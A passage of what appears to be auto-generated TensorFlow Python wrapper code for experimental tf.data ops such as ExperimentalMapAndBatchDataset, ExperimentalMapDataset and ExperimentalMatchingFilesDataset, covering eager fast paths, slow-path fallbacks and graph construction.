    batch_size: A `Tensor` of type `int64`.
      A scalar representing the number of elements to accumulate in a
      batch. It determines the number of concurrent invocations of `f` that process
      elements from `input_dataset` in parallel.
    num_parallel_calls: A `Tensor` of type `int64`.
      A scalar representing the maximum number of parallel invocations of the `map_fn`
      function. Applying the `map_fn` on consecutive input elements in parallel has
      the potential to improve input pipeline throughput.
    drop_remainder: A `Tensor` of type `bool`.
      A scalar representing whether the last batch should be dropped in case its size
      is smaller than desired.
    f: A function decorated with @Defun.
      A function to apply to the outputs of `input_dataset`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of
      `ints`) that has length `>= 1`.
    preserve_cardinality: An optional `bool`. Defaults to `False`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalMapAndBatchDataset", name,
          _ctx._post_execution_callbacks, input_dataset, other_arguments,
          batch_size, num_parallel_calls, drop_remainder, "f", f,
          "output_types", output_types, "output_shapes", output_shapes,
          "preserve_cardinality", preserve_cardinality)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_map_and_batch_dataset_eager_fallback(
            input_dataset, other_arguments, batch_size, num_parallel_calls,
            drop_remainder, f=f, output_types=output_types,
            output_shapes=output_shapes,
            preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_map_and_batch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_map_and_batch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Apply the default for the optional bool attr before validating it.
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalMapAndBatchDataset", input_dataset=input_dataset,
      other_arguments=other_arguments, batch_size=batch_size,
      num_parallel_calls=num_parallel_calls, drop_remainder=drop_remainder,
      f=f, output_types=output_types, output_shapes=output_shapes,
      preserve_cardinality=preserve_cardinality, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
            "output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"), "preserve_cardinality",
            _op.get_attr("preserve_cardinality"))
  _execute.record_gradient(
      "ExperimentalMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalMapAndBatchDataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_map_and_batch_dataset(
      input_dataset, other_arguments, batch_size, num_parallel_calls,
      drop_remainder, f, output_types, output_shapes,
      preserve_cardinality=preserve_cardinality, name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalMapAndBatchDataset.__doc__ = experimental_map_and_batch_dataset.__doc__
ExperimentalMapAndBatchDataset = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalMapAndBatchDataset))
tf_export("raw_ops.ExperimentalMapAndBatchDataset")(ExperimentalMapAndBatchDataset)
def experimental_map_and_batch_dataset_eager_fallback(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_map_and_batch_dataset: executes the
  ExperimentalMapAndBatchDataset op through the Python eager-execution path
  when the C fast path raised a FallbackException.
  """
  _ctx = ctx if ctx else _context.context()
  # Validate and canonicalize the list-valued attrs.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_map_and_batch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_map_and_batch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Apply the default for the optional bool attr before validating it.
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  # Infer Targuments from the captured-argument tensors.
  _attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  batch_size = _ops.convert_to_tensor(batch_size, _dtypes.int64)
  num_parallel_calls = _ops.convert_to_tensor(num_parallel_calls, _dtypes.int64)
  drop_remainder = _ops.convert_to_tensor(drop_remainder, _dtypes.bool)
  _inputs_flat = [input_dataset] + list(other_arguments) + [batch_size, num_parallel_calls, drop_remainder]
  _attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
            output_types, "output_shapes", output_shapes,
            "preserve_cardinality", preserve_cardinality)
  _result = _execute.execute(b"ExperimentalMapAndBatchDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_map_dataset(input_dataset, other_arguments, f, output_types, output_shapes, use_inter_op_parallelism=True, preserve_cardinality=False, name=None):
  r"""Creates a dataset that applies `f` to the outputs of `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    other_arguments: A list of `Tensor` objects.
    f: A function decorated with @Defun.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of
      `ints`) that has length `>= 1`.
    use_inter_op_parallelism: An optional `bool`. Defaults to `True`.
    preserve_cardinality: An optional `bool`. Defaults to `False`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalMapDataset", name, _ctx._post_execution_callbacks,
          input_dataset, other_arguments, "f", f, "output_types", output_types,
          "output_shapes", output_shapes, "use_inter_op_parallelism",
          use_inter_op_parallelism, "preserve_cardinality",
          preserve_cardinality)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_map_dataset_eager_fallback(
            input_dataset, other_arguments, f=f, output_types=output_types,
            output_shapes=output_shapes,
            use_inter_op_parallelism=use_inter_op_parallelism,
            preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_map_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_map_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Apply defaults for the optional bool attrs before validating them.
  if use_inter_op_parallelism is None:
    use_inter_op_parallelism = True
  use_inter_op_parallelism = _execute.make_bool(use_inter_op_parallelism, "use_inter_op_parallelism")
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalMapDataset", input_dataset=input_dataset,
      other_arguments=other_arguments, f=f, output_types=output_types,
      output_shapes=output_shapes,
      use_inter_op_parallelism=use_inter_op_parallelism,
      preserve_cardinality=preserve_cardinality, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
            "output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"), "use_inter_op_parallelism",
            _op.get_attr("use_inter_op_parallelism"), "preserve_cardinality",
            _op.get_attr("preserve_cardinality"))
  _execute.record_gradient(
      "ExperimentalMapDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalMapDataset(input_dataset, other_arguments, f, output_types, output_shapes, use_inter_op_parallelism=True, preserve_cardinality=False, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_map_dataset(
      input_dataset, other_arguments, f, output_types, output_shapes,
      use_inter_op_parallelism=use_inter_op_parallelism,
      preserve_cardinality=preserve_cardinality, name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalMapDataset.__doc__ = experimental_map_dataset.__doc__
ExperimentalMapDataset = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalMapDataset))
tf_export("raw_ops.ExperimentalMapDataset")(ExperimentalMapDataset)
def experimental_map_dataset_eager_fallback(input_dataset, other_arguments, f, output_types, output_shapes, use_inter_op_parallelism=True, preserve_cardinality=False, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_map_dataset: executes the
  ExperimentalMapDataset op through the Python eager-execution path when the
  C fast path raised a FallbackException.
  """
  _ctx = ctx if ctx else _context.context()
  # Validate and canonicalize the list-valued attrs.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_map_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_map_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Apply defaults for the optional bool attrs before validating them.
  if use_inter_op_parallelism is None:
    use_inter_op_parallelism = True
  use_inter_op_parallelism = _execute.make_bool(use_inter_op_parallelism, "use_inter_op_parallelism")
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  # Infer Targuments from the captured-argument tensors.
  _attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  _inputs_flat = [input_dataset] + list(other_arguments)
  _attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
            output_types, "output_shapes", output_shapes,
            "use_inter_op_parallelism", use_inter_op_parallelism,
            "preserve_cardinality", preserve_cardinality)
  _result = _execute.execute(b"ExperimentalMapDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalMapDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_matching_files_dataset(patterns, name=None):
  r"""Creates a dataset of the filenames matching the given glob `patterns`.

  Args:
    patterns: A `Tensor` of type `string`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalMatchingFilesDataset", name,
          _ctx._post_execution_callbacks, patterns)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_matching_files_dataset_eager_fallback(
            patterns, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph. This op has no attrs to validate.
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalMatchingFilesDataset", patterns=patterns, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = None
  _execute.record_gradient(
      "ExperimentalMatchingFilesDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalMatchingFilesDataset(patterns, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_matching_files_dataset(patterns, name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalMatchingFilesDataset.__doc__ = experimental_matching_files_dataset.__doc__
ExperimentalMatchingFilesDataset = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalMatchingFilesDataset))
tf_export("raw_ops.ExperimentalMatchingFilesDataset")(ExperimentalMatchingFilesDataset)
def experimental_matching_files_dataset_eager_fallback(patterns, name=None, ctx=None):
  r"""Slow-path eager implementation of experimental_matching_files_dataset.

  Used when the C fast path raises a FallbackException.
  """
  eager_ctx = ctx if ctx else _context.context()
  patterns = _ops.convert_to_tensor(patterns, _dtypes.string)
  flat_inputs = [patterns]
  op_attrs = None  # This op carries no attrs.
  outputs = _execute.execute(b"ExperimentalMatchingFilesDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs,
                             ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalMatchingFilesDataset", flat_inputs, op_attrs, outputs,
      name)
  dataset_variant, = outputs
  return dataset_variant
def experimental_materialized_index_dataset_handle(container, shared_name, output_types, output_shapes, name=None):
  r"""Creates a handle to a materialized index dataset resource.

  Args:
    container: A `string`.
    shared_name: A `string`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of
      `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `resource`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalMaterializedIndexDatasetHandle", name,
          _ctx._post_execution_callbacks, "container", container,
          "shared_name", shared_name, "output_types", output_types,
          "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_materialized_index_dataset_handle_eager_fallback(
            container=container, shared_name=shared_name,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  container = _execute.make_str(container, "container")
  shared_name = _execute.make_str(shared_name, "shared_name")
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_materialized_index_dataset_handle' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_materialized_index_dataset_handle' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalMaterializedIndexDatasetHandle", container=container,
      shared_name=shared_name, output_types=output_types,
      output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("container", _op.get_attr("container"), "shared_name",
            _op.get_attr("shared_name"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalMaterializedIndexDatasetHandle", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalMaterializedIndexDatasetHandle(container, shared_name, output_types, output_shapes, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_materialized_index_dataset_handle(
      container, shared_name, output_types, output_shapes, name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalMaterializedIndexDatasetHandle.__doc__ = experimental_materialized_index_dataset_handle.__doc__
ExperimentalMaterializedIndexDatasetHandle = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalMaterializedIndexDatasetHandle))
tf_export("raw_ops.ExperimentalMaterializedIndexDatasetHandle")(ExperimentalMaterializedIndexDatasetHandle)
def experimental_materialized_index_dataset_handle_eager_fallback(container, shared_name, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_materialized_index_dataset_handle:
  executes the ExperimentalMaterializedIndexDatasetHandle op through the
  Python eager-execution path when the C fast path raised a
  FallbackException.
  """
  _ctx = ctx if ctx else _context.context()
  # Validate and canonicalize the string and list-valued attrs.
  container = _execute.make_str(container, "container")
  shared_name = _execute.make_str(shared_name, "shared_name")
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_materialized_index_dataset_handle' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_materialized_index_dataset_handle' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # This op takes no tensor inputs; everything is carried as attrs.
  _inputs_flat = []
  _attrs = ("container", container, "shared_name", shared_name,
            "output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalMaterializedIndexDatasetHandle", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalMaterializedIndexDatasetHandle", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_max_intra_op_parallelism_dataset(input_dataset, max_intra_op_parallelism, output_types, output_shapes, name=None):
  r"""Creates a dataset that overrides the maximum intra-op parallelism.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    max_intra_op_parallelism: A `Tensor` of type `int64`.
      Identifies the maximum intra-op parallelism to use.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of
      `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalMaxIntraOpParallelismDataset", name,
          _ctx._post_execution_callbacks, input_dataset,
          max_intra_op_parallelism, "output_types", output_types,
          "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_max_intra_op_parallelism_dataset_eager_fallback(
            input_dataset, max_intra_op_parallelism,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalMaxIntraOpParallelismDataset", input_dataset=input_dataset,
      max_intra_op_parallelism=max_intra_op_parallelism,
      output_types=output_types, output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalMaxIntraOpParallelismDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalMaxIntraOpParallelismDataset(input_dataset, max_intra_op_parallelism, output_types, output_shapes, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_max_intra_op_parallelism_dataset(
      input_dataset, max_intra_op_parallelism, output_types, output_shapes,
      name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalMaxIntraOpParallelismDataset.__doc__ = experimental_max_intra_op_parallelism_dataset.__doc__
ExperimentalMaxIntraOpParallelismDataset = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalMaxIntraOpParallelismDataset))
tf_export("raw_ops.ExperimentalMaxIntraOpParallelismDataset")(ExperimentalMaxIntraOpParallelismDataset)
def experimental_max_intra_op_parallelism_dataset_eager_fallback(input_dataset, max_intra_op_parallelism, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_max_intra_op_parallelism_dataset:
  executes the ExperimentalMaxIntraOpParallelismDataset op through the Python
  eager-execution path when the C fast path raised a FallbackException.
  """
  _ctx = ctx if ctx else _context.context()
  # Validate and canonicalize the list-valued attrs.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Convert inputs to tensors and execute the op (1 output expected).
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  max_intra_op_parallelism = _ops.convert_to_tensor(max_intra_op_parallelism, _dtypes.int64)
  _inputs_flat = [input_dataset, max_intra_op_parallelism]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalMaxIntraOpParallelismDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalMaxIntraOpParallelismDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_non_serializable_dataset(input_dataset, output_types, output_shapes, name=None):
  r"""Wraps `input_dataset` in a marker dataset that cannot be serialized.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of
      `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalNonSerializableDataset", name,
          _ctx._post_execution_callbacks, input_dataset, "output_types",
          output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_non_serializable_dataset_eager_fallback(
            input_dataset, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_non_serializable_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_non_serializable_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalNonSerializableDataset", input_dataset=input_dataset,
      output_types=output_types, output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalNonSerializableDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalNonSerializableDataset(input_dataset, output_types, output_shapes, name=None):
  # Thin pass-through wrapper for the tf.raw_ops export below.
  return experimental_non_serializable_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalNonSerializableDataset.__doc__ = experimental_non_serializable_dataset.__doc__
# Hide from generated API docs, force keyword-only calls, then export as a raw op.
ExperimentalNonSerializableDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalNonSerializableDataset))
tf_export("raw_ops.ExperimentalNonSerializableDataset")(ExperimentalNonSerializableDataset)
def experimental_non_serializable_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_non_serializable_dataset
  """
  # Use the caller-supplied context when given; otherwise the default one.
  _ctx = ctx or _context.context()
  # Canonicalize the list-valued attributes, rejecting non-sequences.
  if isinstance(output_types, (list, tuple)):
    output_types = [_execute.make_type(_dt, "output_types") for _dt in output_types]
  else:
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_non_serializable_dataset' Op, not %r." % output_types)
  if isinstance(output_shapes, (list, tuple)):
    output_shapes = [_execute.make_shape(_sh, "output_shapes") for _sh in output_shapes]
  else:
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_non_serializable_dataset' Op, not %r." % output_shapes)
  # Convert the input to the variant dtype the op expects, then execute.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  _inputs_flat = [input_dataset]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalNonSerializableDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalNonSerializableDataset", _inputs_flat, _attrs, _result,
      name)
  (_out,) = _result
  return _out
def experimental_numa_map_and_batch_dataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
  r"""Creates a dataset that fuses mapping with batching.

  Creates a dataset that applies `f` to the outputs of `input_dataset` and then
  batches `batch_size` of them.

  Unlike a "MapDataset", which applies `f` sequentially, this dataset invokes up
  to `batch_size * num_parallel_batches` copies of `f` in parallel.

  Unlike "MapAndBatchDatasetV2", this dataset uses a NUMA-aware thread scheduling
  policy. Because it uses the single-threaded executor, it only supports the
  function-based control flow ops.

  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the input dataset.
    other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when building a closure
      for `f`.
    batch_size: A `Tensor` of type `int64`.
      A scalar representing the number of elements to accumulate in a
      batch. It determines the number of concurrent invocations of `f` that process
      elements from `input_dataset` in parallel.
    num_parallel_calls: A `Tensor` of type `int64`.
      A scalar representing the maximum number of parallel invocations of the `map_fn`
      function. Applying the `map_fn` on consecutive input elements in parallel has
      the potential to improve input pipeline throughput.
    drop_remainder: A `Tensor` of type `bool`.
      A scalar representing whether the last batch should be dropped in case its size
      is smaller than desired.
    f: A function decorated with @Defun.
      A function to apply to the outputs of `input_dataset`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    preserve_cardinality: An optional `bool`. Defaults to `False`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch directly through the C API.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalNumaMapAndBatchDataset", name,
        _ctx._post_execution_callbacks, input_dataset, other_arguments,
